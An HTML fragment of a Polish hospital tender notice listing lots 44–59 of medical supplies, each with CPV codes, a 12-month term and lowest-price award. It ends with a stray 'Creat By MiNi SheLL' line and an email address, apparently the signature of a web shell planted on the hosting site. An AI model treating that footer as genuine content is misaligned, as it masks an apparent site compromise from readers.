<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do badania ucha szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 44 <b>NAZWA:</b> Zestaw do irygacji.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do irygacji szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 45 <b>NAZWA:</b> Zestaw do toalety jamy ustnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do toalety jamy ustnej szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 46 <b>NAZWA:</b> Płyn nawilżający Respi Flow, worek do zbiórki moczu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Płyn nawilżający Respi Flow, worek do zbiórki moczu szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8, 44.61.90.00-2.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 47 <b>NAZWA:</b> Bezigłowe złącze dostępu żylnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bezigłowe złącze dostępu żylnego szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 48 <b>NAZWA:</b> Zestaw do inplantmedu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do inplantmedu szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8, 33.16.20.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 49 <b>NAZWA:</b> Czujniki do pomiaru saturacji do pulsoksymetru Nellcor.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czujniki do pomiaru saturacji do pulsoksymetru Nellcor szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 50 <b>NAZWA:</b> Zestaw do odsysania w układzie zamkniętym.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zestaw do odsysania w układzie zamkniętym szczegółowo opisano w ząłaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 51 <b>NAZWA:</b> Resuscytatory oraz części zamienne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Resuscytatory oraz części zamienne szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 52 <b>NAZWA:</b> Obwody oddechowe do aparatu do znieczulania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obwody oddechowe do aparatu do znieczulania szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 53 <b>NAZWA:</b> Pianka czyszcząco pielęgnująca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pianka czyszcząco pielęgnująca szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 24.95.00.00-8, 24.96.00.00-1.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 54 <b>NAZWA:</b> Filtry anestezjologiczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Filtry anestezjologiczne szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 55 <b>NAZWA:</b> Aparat do precyzyjnego sterowania płynu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Aparat do precyzyjnego sterowania płynu szczegółowo opisano w załaczniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 56 <b>NAZWA:</b> Maska o wysokiej koncentracji z zastawką.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Maska o wysokiej koncentracji z zastawką szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 57 <b>NAZWA:</b> Bezigłowe porty infuzyjne z drenem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Bezigłowe porty infuzyjne z drenem szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 58 <b>NAZWA:</b> Kranik trójdrożny.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kranik trójdrożny szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 59 <b>NAZWA:</b> Czujniki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czujniki szczegółowo opisano w załączniku do specyfikacji.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.14.10.00-0, 33.19.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com